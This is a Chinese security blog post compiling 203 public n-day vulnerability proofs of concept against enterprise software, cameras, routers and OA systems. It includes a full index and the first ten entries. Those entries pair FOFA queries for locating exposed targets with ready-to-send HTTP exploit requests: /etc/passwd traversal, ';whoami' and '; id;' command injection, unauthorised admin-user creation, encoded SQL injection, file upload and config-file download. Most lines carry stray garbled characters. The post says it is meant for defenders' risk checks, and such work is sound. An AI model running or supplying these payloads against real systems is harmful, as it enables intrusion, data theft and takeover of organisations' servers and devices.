互联网公开漏洞整理202309-202406( V" Q' s# N3 R( s/ O8 T/ ?
道一安全 2024-06-05 07:41 北京
# g7 K4 Q+ t" {1 A以下文章来源于网络安全新视界 ,作者网络安全新视界. h+ Y- g: m* i4 ^7 U6 ]
5 f: J) }4 ?4 _; S/ I7 r. M发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
5 m1 g: M& l- ?+ S
1 }3 O$ O% {9 V$ ?" D/ Q- k2 c漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
6 }) A3 M6 v3 [& @$ V7 z% D& ?
6 `1 n/ i& P1 {3 s" A安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
2 _; _8 D' M4 L
& n& ^8 S3 a7 r" }: j文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。5 F9 }9 [! _. P8 t6 s7 f* I
8 s& | i/ x4 F T7 c5 j) @合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
/ S# H& v4 F; W- ~8 ?& ?( c& Z1 \0 _9 @' D6 V$ }) [* ]
5 u+ W) _9 t' [7 t4 ]2 h3 W
声明
' j) {9 W4 i+ j2 E4 d* d' h7 S( @
9 D+ k. |, J8 h+ F; @6 @为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。3 ?1 o" c; g: n" Y+ r* r: M
' u- p8 W" N' ]有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。. P r% w0 x3 b: D+ Z# ?2 K2 W
9 \- M; ~$ H1 y; j0 c" F" g/ Z' F; W9 y1 x. ]
* m# P* Q0 s- C3 T目录6 s O( N; M x/ l- F
, G/ w {% r* R( m1 |01
4 x8 I; B$ s4 D* D4 g! P1 B) F" d$ O) x9 i5 A& f% u
1. StarRocks MPP数据库未授权访问8 J7 P7 \) M4 A$ G
2. Casdoor系统static任意文件读取$ ]- D1 @ ^# W$ j1 x
3. EasyCVR智能边缘网关 userlist 信息泄漏
% L) V2 D5 r7 e; u$ h' c* V4. EasyCVR视频管理平台存在任意用户添加
! H% k2 h: J% y* o5. NUUO NVR 视频存储管理设备远程命令执行
; X# I3 j% B7 p0 R6. 深信服 NGAF 任意文件读取
& M% d3 e; \0 Q7 J* a u7. 鸿运主动安全监控云平台任意文件下载) p R' u; Q. Q* _2 ~1 @
8. 斐讯 Phicomm 路由器RCE" w! U9 P4 a$ `& c3 A6 A% y
9. 稻壳CMS keyword 未授权SQL注入# B: J! d8 M4 ~
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传9 a2 @) ?6 s3 q6 ? {. q1 I
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
! ]% m/ @1 U4 t12. Jorani < 1.0.2 远程命令执行$ E8 B. l6 R' h5 h
13. 红帆iOffice ioFileDown任意文件读取
/ m$ Z1 g( R( R# i4 G; f' b# y( j14. 华夏ERP(jshERP)敏感信息泄露- L8 n6 z, y& L5 d: \/ F0 m: `% y
15. 华夏ERP getAllList信息泄露4 G8 b! v$ n# p6 V! x$ p8 C4 D
16. 红帆HFOffice医微云SQL注入# }9 i* I6 e- J- j) ?4 ?
17. 大华 DSS itcBulletin SQL 注入+ F8 V: m* _$ p; k5 h: h5 n, z
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露5 h4 \. k! k q6 ~6 D A
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
/ g" S2 }; q% p$ N" p( r20. 大华ICC智能物联综合管理平台任意文件读取# }2 E+ o6 o7 U) A
21. 大华ICC智能物联综合管理平台random远程代码执行
0 Z# e7 P, } ^, k22. 大华ICC智能物联综合管理平台 log4j远程代码执行5 W2 k5 F ]) e, V* M1 ?
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
! ~" Z" T8 o5 z2 k24. 用友NC 6.5 accept.jsp任意文件上传0 Y+ V, Z1 r5 Q- v- d: v: r
25. 用友NC registerServlet JNDI 远程代码执行. E4 _8 _+ w+ b1 \
26. 用友NC linkVoucher SQL注入
. f+ p$ e# _4 |3 v27. 用友 NC showcontent SQL注入2 P! O9 C8 U8 `( k4 A2 j
28. 用友NC grouptemplet 任意文件上传
' F: j/ W0 `: X* r29. 用友NC down/bill SQL注入
v- L" t( |+ ?% `4 `$ e! h% M" v4 x30. 用友NC importPml SQL注入
. D, u' k0 W# Z$ {& `; @31. 用友NC runStateServlet SQL注入6 I/ d9 Q4 ?1 K7 H
32. 用友NC complainbilldetail SQL注入 a. q0 u' y% w4 ~3 ~
33. 用友NC downTax/download SQL注入 J/ _+ i$ h$ F
34. 用友NC warningDetailInfo接口SQL注入
3 X# X4 t% u9 t$ B9 x" K( p/ I35. 用友NC-Cloud importhttpscer任意文件上传1 f& c6 {$ \+ u0 @2 i) h" z
36. 用友NC-Cloud soapFormat XXE( W0 T/ k6 ?4 J1 z$ C
37. 用友NC-Cloud IUpdateService XXE5 r, H9 G# k, Y; p' `. g. ]' L' q
38. 用友U8 Cloud smartweb2.RPC.d XXE
5 ?) v4 U% _! o39. 用友U8 Cloud RegisterServlet SQL注入
! q1 b; E4 y( \" T. y40. 用友U8-Cloud XChangeServlet XXE
: E" x7 o( B# M9 B1 R41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
9 X& |& ?3 U% P# @) Z$ z42. 用友GRP-U8 SmartUpload01 文件上传 r, w3 Z* _. R7 o2 y
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
. X, Z2 Z/ T6 v8 f4 _( k1 N. H3 {44. 用友GRP-U8 bx_dj_check.jsp SQL注入" `3 R/ Y/ Y# ?
45. 用友GRP-U8 ufgovbank XXE
& Z2 \( e( N8 O: O' F46. 用友GRP-U8 sqcxIndex.jsp SQL注入
' \3 h7 c+ ?2 u47. 用友GRP A++Cloud 政府财务云 任意文件读取5 L3 I. d( T" w+ L
48. 用友U8 CRM swfupload 任意文件上传
, Z, w. q; @8 i% e49. 用友U8 CRM系统uploadfile.php接口任意文件上传' i0 g, H4 j6 M
50. QDocs Smart School 6.4.1 filterRecords SQL注入
# A e4 i! Z$ l5 @7 u# q$ v' b& q51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入; g& }1 M& [4 r% K' ~9 G) h; Q
52. 泛微E-Office json_common.php sql注入$ M2 O' }: u5 l
53. 迪普 DPTech VPN Service 任意文件上传8 t; u2 d6 i0 [ t0 k" ?- R( |+ R
54. 畅捷通T+ getstorewarehousebystore 远程代码执行! P' w1 A( [! m6 b( p8 G
55. 畅捷通T+ getdecallusers信息泄露
" c& i, K& ? C d4 e0 s56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
" B# _9 E( N& |' ]5 G57. 畅捷通T+ keyEdit.aspx SQL注入* E) C$ v- M4 [- p6 @" V* H
58. 畅捷通T+ KeyInfoList.aspx sql注入
7 q* D, h+ o& b/ K59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行' e, j- D" e' A# o% K: Q/ I
60. 百卓Smart管理平台 importexport.php SQL注入
( w2 K3 m& B. V! [61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
4 {7 n' C* Q# P. v$ u- k62. IP-guard WebServer 远程命令执行( S- \2 _5 Y; h4 k4 W
63. IP-guard WebServer任意文件读取
' }. Q0 H5 |' M6 S; a: J( h64. 捷诚管理信息系统CWSFinanceCommon SQL注入( q$ `6 Y# R( \, n1 v
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
! F) r( A3 r! K( n66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入! `' _, `5 e) Y4 r, _
67. 万户ezOFFICE wpsservlet任意文件上传+ z2 {3 ~+ Z0 z+ B" y3 A
68. 万户ezOFFICE wf_printnum.jsp SQL注入
. `' ~' h* L& u) W( m6 _69. 万户 ezOFFICE contract_gd.jsp SQL注入' n2 i. V# w4 [7 W" T/ Q
70. 万户ezEIP success 命令执行% n8 J8 d6 K' T" L9 q9 ~
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
6 `7 P6 h0 U" B! @+ E72. 致远OA getAjaxDataServlet XXE6 B* |: t/ I" ?2 y/ {
73. GeoServer wms远程代码执行
( V+ r7 G( l2 C& a4 t2 H$ S74. 致远M3-server 6_1sp1 反序列化RCE
) z( n2 X- \. s75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE9 W g: T1 P* ~& b! R9 m
76. 新开普掌上校园服务管理平台service.action远程命令执行7 d2 h8 Z4 R9 Z3 _8 f1 R: y8 x- Q3 _
77. F22服装管理软件系统UploadHandler.ashx任意文件上传: V) v4 ?% `* H
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 V8 Y- C5 q. D: ^79. BYTEVALUE 百为流控路由器远程命令执行$ @7 U+ ?' t# E+ R. q4 b
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传7 B. J$ k/ L3 }% ~5 Z5 P3 g, f9 V
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露0 J% S1 T- w. R' o& j7 Z
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行' x$ I; h8 F+ N" w$ o8 `6 K* J
83. JeecgBoot testConnection 远程命令执行5 [3 w4 m( T. h9 H+ u5 n
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入# R$ t2 b: l4 b2 z3 f
85. SysAid On-premise< 23.3.36远程代码执行
1 g, {6 w3 }% \; W3 `4 \- B& j86. 日本tosei自助洗衣机RCE
" g, j9 L6 U* R( u" E% G87. 安恒明御安全网关aaa_local_web_preview文件上传/ U/ W. s# m- { K
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
' ^9 w6 {! Q) x, U# V89. 致远互联FE协作办公平台editflow_manager存在sql注入
3 l+ h' T1 K. c" v" L/ a1 f8 `* v+ m90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& N; E& ]0 W4 f; @7 ^
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取, j8 D; y6 j$ Z2 r( a" e
92. 海康威视运行管理中心session命令执行6 x/ i+ N. @" j8 @. I, O. v0 l
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
& ^# Y1 T! {3 _ m- e! z6 p94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传4 n q" ]5 r- P3 `/ ^1 f: c# \
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行) J' G7 J3 f r; E0 E$ c
96. Apache OFBiz 18.12.11 groovy 远程代码执行' r$ l/ ?% T$ K) y7 H: f0 O8 M- {3 P2 `
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
5 v+ P7 ] O! z3 C% Y7 X98. SpiderFlow爬虫平台远程命令执行
4 Y! _1 O, u0 |: q/ b+ \+ M8 O99. Ncast盈可视高清智能录播系统busiFacade RCE4 \7 y4 M0 H2 K6 g3 u% S C- x6 m
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
/ ]+ T3 ~! U1 E# P3 W101. ivanti policy secure-22.6命令注入. T: Y2 H, y2 i
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
; E# m N1 D4 `( j+ z( p% b! p103. Ivanti Pulse Connect Secure VPN XXE8 {4 t+ ]; I+ F2 ~" p1 I
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露* G; O, E4 l$ m( G
105. SpringBlade v3.2.0 export-user SQL 注入' Y0 v! d; I/ \& O! I+ \2 ?
106. SpringBlade dict-biz/list SQL 注入
/ z# B, T- h+ {# f' Y+ ], v, ?& H107. SpringBlade tenant/list SQL 注入
) i1 D$ v7 @. M+ E0 {4 W' t108. D-Tale 3.9.0 SSRF
3 c( l' Q0 S8 d2 V109. Jenkins CLI 任意文件读取
; w* J; W I. V& I110. Goanywhere MFT 未授权创建管理员+ w, J8 \+ |' B" Z
111. WordPress Plugin HTML5 Video Player SQL注入
: |# r5 _) s. M112. WordPress Plugin NotificationX SQL 注入
2 X! q e1 A! F0 E* `113. WordPress Automatic 插件任意文件下载和SSRF. [; r. T: i# t1 c! `
114. WordPress MasterStudy LMS插件 SQL注入
( c* N$ O3 P3 p+ m! X' d2 E115. WordPress Bricks Builder <= 1.9.6 RCE
- d5 I- s' Y W# t116. wordpress js-support-ticket文件上传
_$ j; @5 w) Q117. WordPress LayerSlider插件SQL注入
+ {% ?& S0 S: ?0 M& d118. 北京百绰智能S210管理平台uploadfile.php任意文件上传0 M2 {6 V& x& `8 r, [0 J* h
119. 北京百绰智能S20后台sysmanageajax.php sql注入
S9 x9 D0 K/ ~$ c5 V+ \ z+ U5 q120. 北京百绰智能S40管理平台导入web.php任意文件上传
3 ^0 Q& f/ ~' L: C3 J121. 北京百绰智能S42管理平台userattestation.php任意文件上传3 H6 A' r: ~; _
122. 北京百绰智能s200管理平台/importexport.php sql注入
! S* r; }# O3 P; D& D/ Z4 ~7 R1 K123. Atlassian Confluence 模板注入代码执行0 m. U3 }5 }+ O: x. N
124. 湖南建研工程质量检测系统任意文件上传* @# m) ^0 o7 D5 m2 V* P
125. ConnectWise ScreenConnect身份验证绕过
4 m. I' R3 k) W l9 M, v; C126. Aiohttp 路径遍历& u8 U" X) K4 C6 ~, U+ U* A, T& h
127. 广联达Linkworks DataExchange.ashx XXE
- f- H/ Y7 {! Y/ T128. Adobe ColdFusion 反序列化( |/ i ~) ] D9 h; ] P1 u/ n' K
129. Adobe ColdFusion 任意文件读取* C5 E* v' t: L1 ^
130. Laykefu客服系统任意文件上传
- g- @3 {( L7 U0 d$ J t5 Y$ i131. Mini-Tmall <=20231017 SQL注入
7 l2 L2 z' v: e! A132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过) l0 |5 }9 J! v: `; y! A, _' P
133. H5 云商城 file.php 文件上传" J- \- t/ \4 o: }5 A! g
134. 网康NS-ASG应用安全网关index.php sql注入
% T/ [- v3 v5 L+ L# K1 ?135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入+ O$ v/ X+ L5 P# |7 z
136. NextChat cors SSRF
" ^3 y2 `# Q7 n, o; V137. 福建科立迅通信指挥调度平台down_file.php sql注入
0 z$ _- ~6 \' ^& m5 f" f5 E/ C1 J138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
& f6 {4 Z, w3 `$ N0 z2 K139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ Q. X2 O) |- I$ P. T* f; `
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入% E5 J" H* N# k. U& p+ V, y
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
) E1 l" y+ F8 M J+ ~142. CMSV6车辆监控平台系统中存在弱密码& H3 p# t) _# k+ j' d4 Y
143. Netis WF2780 v2.1.40144 远程命令执行4 W' } w( [7 T8 B+ P1 z( f/ W2 E
144. D-Link nas_sharing.cgi 命令注入
( b7 v( U" K6 {145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
7 `7 x, U5 {; ^146. MajorDoMo thumb.php 未授权远程代码执行
$ {$ k2 W' o; q6 O3 T: v147. RaidenMAILD邮件服务器v.4.9.4-路径遍历5 S1 r# ?4 K8 [/ t t
148. CrushFTP 认证绕过模板注入
7 ]: J( ^5 L6 X. m; S0 W I149. AJ-Report开源数据大屏存在远程命令执行
* W: s, S7 K. Z6 i2 q9 {150. AJ-Report 1.4.0 认证绕过与远程代码执行3 E( Z+ r) |9 h" k" \5 A
151. AJ-Report 1.4.1 pageList sql注入
; s6 e! X( E& |3 J- E152. Progress Kemp LoadMaster 远程命令执行
, R/ n0 l6 U: b9 L8 \153. gradio任意文件读取' c+ C) G) d5 T3 r& @3 Z3 S
154. 天维尔消防救援作战调度平台 SQL注入
C% h$ c; k) a9 t6 Z4 ^155. 六零导航页 file.php 任意文件上传$ [/ a H" ]2 A+ U- L. `' e
156. TBK DVR-4104/DVR-4216 操作系统命令注入- {/ U: f- C/ Q4 G s" W
157. 美特CRM upload.jsp 任意文件上传1 q# Y" X+ a% C( z9 d
158. Mura-CMS-processAsyncObject存在SQL注入
- V# \2 h9 l& A: h/ m. `' v9 _159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传5 g6 l! l" D2 H, y9 p5 d
160. Sonatype Nexus Repository 3目录遍历与文件读取
u0 I! ?! q1 Y) N; M8 \161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 r8 C! d' e' k1 O1 _! g3 }162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传6 Y5 M, N+ R) v. P+ K7 U* Z
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
9 M$ B: T" y% A% H& L2 n1 g# m% v164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传- y3 y, T7 n. k" ^
165. OrangeHRM 3.3.3 SQL 注入- N3 O% V: X5 C& q" Z
166. 中成科信票务管理平台SeatMapHandler SQL注入# b* N# N" Z) Z# W
167. 精益价值管理系统 DownLoad.aspx任意文件读取
( z9 ?; i! I1 M( s168. 宏景EHR OutputCode 任意文件读取8 h6 A! ^* n- x8 y" s5 \, b
169. 宏景EHR downlawbase SQL注入* ^( P! U0 G6 f& |. S, {
170. 宏景EHR DisplayExcelCustomReport 任意文件读取! E% O- ]3 p2 d$ X4 h
171. 通天星CMSV6车载定位监控平台 SQL注入5 z5 _/ `/ K0 b& s- }! u
172. DT-高清车牌识别摄像机任意文件读取# ~. X6 }* H' d9 f' Q2 t
173. Check Point 安全网关任意文件读取# y6 m: s7 R( E- [! B, E9 W1 }
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
6 V# [ m# O( ~9 k175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入+ L9 b! d# S# l8 {8 y/ ^4 M. I, @4 P
176. 电信网关配置管理系统 rewrite.php 文件上传4 [# p, l9 R! |+ ^ y
177. H3C路由器敏感信息泄露
: Q2 I. [/ u( S+ U& s178. H3C校园网自助服务系统-flexfileupload-任意文件上传& z* w/ o8 n1 k- {9 N; `
179. 建文工程管理系统存在任意文件读取
: k# G% S' a( X: Q/ c3 x9 ~4 s180. 帮管客 CRM jiliyu SQL注入
. O' ?% B. k8 L: [; c! Y9 O181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
/ O& [1 j' i2 k8 s* _182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
N6 D v! q/ C# ]183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
1 O% ~$ v2 Y# n* G8 b184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
2 p% s, c/ ?1 v& v" o9 B( y185. 瑞友天翼应用虚拟化系统SQL注入
& m+ E7 ^8 ?9 H; D0 i0 N1 Y( z( u186. F-logic DataCube3 SQL注入
7 i5 Q/ i" `- `2 Q" ~3 o( L) j& m187. Mura CMS processAsyncObject SQL注入6 t! w8 d7 w! T- _, P
188. 叁体-佳会视频会议 attachment 任意文件读取
; B4 Q! ?- n$ {189. 蓝网科技临床浏览系统 deleteStudy SQL注入9 m( B3 X; N W* ^% ]9 K
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
5 k$ K4 T% X9 c8 X* D5 M6 ~+ z7 O191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
, d$ ~: L3 X7 O( b; @0 p9 ~ C9 Y192. 富通天下外贸ERP UploadEmailAttr 任意文件上传3 y) Z0 y0 q. _8 k9 e( x! H
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
" V" e6 f0 n" x6 d E4 t `4 u194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
0 G$ \ p5 ?" @4 T0 q/ p8 x195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
: r4 R" f2 e4 G* `; @! M196. 河南省风速科技统一认证平台密码重置
) J8 J, e" `' T O9 ~197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# N6 D$ e/ P( U' O( j3 @2 c; i% s198. 阿里云盘 WebDAV 命令注入
/ _9 S, z1 _/ X199. cockpit系统assetsmanager_upload接口 文件上传
; [7 ~) W! E! T w$ e8 |- O" E$ E200. SeaCMS海洋影视管理系统dmku SQL注入1 V+ T# M4 A7 \8 {, ~' T3 _
201. 方正全媒体新闻采编系统 binary SQL注入( Q7 t- `+ G' L, y1 P$ ?
202. 微擎系统 AccountEdit任意文件上传
6 ?6 g" ~4 K; X& c; \, l; `203. 红海云EHR PtFjk 文件上传
4 M* ^1 {0 M6 C8 y8 x9 K I% I0 o3 e" Z1 s0 |: A' H* T
POC列表
! m N9 m6 Z) i, G7 t' M( n4 |5 k M
02
$ N1 ^: M& E8 { U$ a q* J7 l) E9 `% @% s9 ^: W
1. StarRocks MPP数据库未授权访问 r) B& B$ W, q3 E
FOFA :title="StarRocks"! m/ F1 f; |. [/ s8 D/ h
GET /mem_tracker HTTP/1.1
' P% M7 D' Y* LHost: URL
9 [5 T/ M, x! O/ U& [3 q7 I: a4 b9 h2 c! |5 W5 ^+ O
5 U7 w* i9 m' y) N/ P# [2. Casdoor系统static任意文件读取
# Q1 ?3 ?! l) [# F$ LFOFA :title="Casdoor"
1 o; p2 u7 O3 Y* SGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1, L \/ h5 Q! _/ @* ~
Host: xx.xx.xx.xx:9999; k( K, {- Z$ W0 Z* f( ? @/ w% A* k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 K- U D. {( W- k* X3 E" |Connection: close
5 }( M5 G* F9 W- A% b- z; P( q7 bAccept: */*
, L- P5 S. L: U% [: _4 M# rAccept-Language: en, P2 E6 f, v& ^4 x% f3 n
Accept-Encoding: gzip' Q' X. c) [) G6 L2 X
, _! v& I3 y/ V8 i1 U( z1 ?. W8 W- Q$ N( C" G
3. EasyCVR智能边缘网关 userlist 信息泄漏
3 v! [1 L O' ^. O, ~4 WFOFA :title="EasyCVR" B% z+ c5 |/ ]' ^# l
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.19 Y- O4 k. i6 r! e& m5 W
Host: xx.xx.xx.xx9 ?( v$ Y+ n- o0 z+ a) L4 o/ T: j
8 x6 ~' s( G$ x0 C4 Z( W# \: z2 ]
. X* a) E; O$ d5 M) R4. EasyCVR视频管理平台存在任意用户添加3 E' _. J% q3 y4 G4 @8 P6 z
FOFA :title="EasyCVR"/ Y- @) Y `% n, \$ Z$ h( F* c
5 t; t4 H [5 v* C/ S4 F. ^9 x4 y: }5 @password更改为自己的密码md5
4 M2 F6 c. ?2 a9 i* l. k0 `8 gPOST /api/v1/adduser HTTP/1.1
" N T# A1 R% Y) o6 g1 ]Host: your-ip5 [# k" u4 E4 L8 I
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
4 P5 O5 a; f" `
& {% {) e n7 Z' m# zname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
* O" P9 Z8 d- S. Y
1 y, a% Z4 e6 q. T$ v+ f+ p/ N. \2 {1 T% P4 Z4 L
5. NUUO NVR 视频存储管理设备远程命令执行
2 Z, W$ e8 V' I& H. G+ B6 eFOFA:title="Network Video Recorder Login"
% [7 E# V5 a5 M$ o! UGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1) }4 Z2 Y3 T$ n3 ^( H
Host: xx.xx.xx.xx! K) A+ v( i w3 g& E" M0 F) _
- }, ]' F+ I# s& L' U
/ _ W. o {7 n, J6. 深信服 NGAF 任意文件读取
) `% Z4 h( N+ VFOFA:title="SANGFOR | NGAF"
# q) {) K; ~7 C- ~7 h$ _GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
+ I) F/ n, E2 U5 A; EHost:
1 m8 W; U$ x! _, a
; `; \# F; ]4 O- e
8 h" o- c N# y( ]) x* B7. 鸿运主动安全监控云平台任意文件下载
, e8 R2 ~( Q% t3 [FOFA:body="./open/webApi.html"
2 N% ]9 l8 d* U9 l2 {; uGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
: r5 ]. M" r9 D! j6 L2 KHost:
3 k' m$ \. k" L$ s9 g+ h1 }" o
" O. l! [8 e# ], F7 z7 s" R: L b! t
8. 斐讯 Phicomm 路由器RCE
. @1 q( b0 _6 m! J vFOFA:icon_hash="-1344736688"
/ ], a6 f: Q! x/ }默认账号admin登录后台后,执行操作3 b B1 m7 T, R" n7 i" \
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1+ y8 ?' z; l8 G1 B/ U+ f! X
Host: x.x.x.x) G" T/ ]* o) d V! `
Cookie: sysauth=第一步登录获取的cookie
9 [* q- Z+ O) f- AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
5 O0 B/ l$ B- {User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* \! [$ J/ I, [( |7 x( j" I" m8 C; ^/ P, _1 N
------WebKitFormBoundaryxbgjoytz
8 Q9 @1 Y1 W, _; y' Z# ~: gContent-Disposition: form-data; name="wifiRebootEnablestatus"* a p# }9 e6 y) U& ?
2 v1 v- U& D5 @. ?- C/ F0 o% B%s
! w/ H+ B, X$ [* J------WebKitFormBoundaryxbgjoytz9 K5 U( E! C* q7 R
Content-Disposition: form-data; name="wifiRebootrange"
1 J9 J! D1 `# s% T0 W
2 w4 l( Z7 K2 r! w8 a- H0 _12:00; id;* \! d: v& s, b! L S
------WebKitFormBoundaryxbgjoytz
+ C, O/ Q+ B2 x+ O- C; |Content-Disposition: form-data; name="wifiRebootendrange"
; v5 b' p& z+ D: ]' e% p2 Z3 |7 d" _5 Y0 U& D% M* X
%s:2 Q X! a. Z2 C5 D. C- V& q! ^
------WebKitFormBoundaryxbgjoytz
8 S3 n8 M* X7 u/ T% V8 V' sContent-Disposition: form-data; name="cururl2"
' Q: m6 i4 e _5 z- F7 G6 n/ U' B
7 W% E' @( t( ~0 m------WebKitFormBoundaryxbgjoytz--
2 O8 i% F; W' J/ c5 t) q$ K( j8 R0 G5 g
! D8 K5 [9 B2 r) m3 i& }, P) Q+ k: G
9. 稻壳CMS keyword 未授权SQL注入. t+ Y9 j7 C/ p- I2 {
FOFA:app="Doccms"$ D0 N+ I$ Q0 p' } E! n' y
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
. z# ^" i7 W/ J/ MHost: x.x.x.x9 p6 ?: @( u; V' m' ?& b
: E! u' J3 m5 y. O* q g
" A) W/ V$ y$ `5 P) U9 mpayload为下列语句的二次Url编码, q6 ]* {5 e4 _+ n: e7 c( s
" y+ H( l7 x" C% s% i% c* O
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#- l0 t7 S- r% K
- `/ H1 ~) Y5 b+ M0 F) W9 V10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
3 Z' r, s" B* ^FOFA:icon_hash="953405444"6 D+ g3 G8 r9 A
' z1 u3 M( F- i: ~% Y0 l) S文件上传后响应中包含上传文件的路径. N2 \9 T' L1 v7 @" g1 i1 q+ W
POST /eis/service/api.aspx?action=saveImg HTTP/1.1* U# a D. P& ~; V# d- G
Host: x.x.x.x:xx
% L0 f, Z \5 F7 j6 `- K5 S' VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.366 u1 A% _$ T+ h* m% z+ R% y7 J
Content-Length: 1972 F" ?5 u& A% ]$ W; h/ P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 j4 c$ P$ y0 }: C! w& o/ vAccept-Encoding: gzip, deflate
! v2 X/ ^4 p! @+ ]0 L9 ?7 g, e; g8 fAccept-Language: zh-CN,zh;q=0.9( e/ X, M$ R" b* K: ]' }
Connection: close3 S( |! }8 ~9 F. k! I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu) o) c c6 w8 m) M. I/ i# [4 g8 b4 i
5 f% P8 h7 t$ o x6 k
------WebKitFormBoundaryxdgaqmqu# t8 c: F* Z8 \9 V
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
. i5 C" |8 B2 I e4 ZContent-Type: text/html
* N& h, m S4 d$ l% ]& d; b0 S; }* ~2 C: \' @, l7 f' N6 I
jmnqjfdsupxgfidopeixbgsxbf# j) D D" r* U
------WebKitFormBoundaryxdgaqmqu--( o1 d$ Z1 k2 w0 K/ ?( O& P2 D
0 t5 {" C' }; ^& j" H& O# `$ p- l8 {; n n1 z
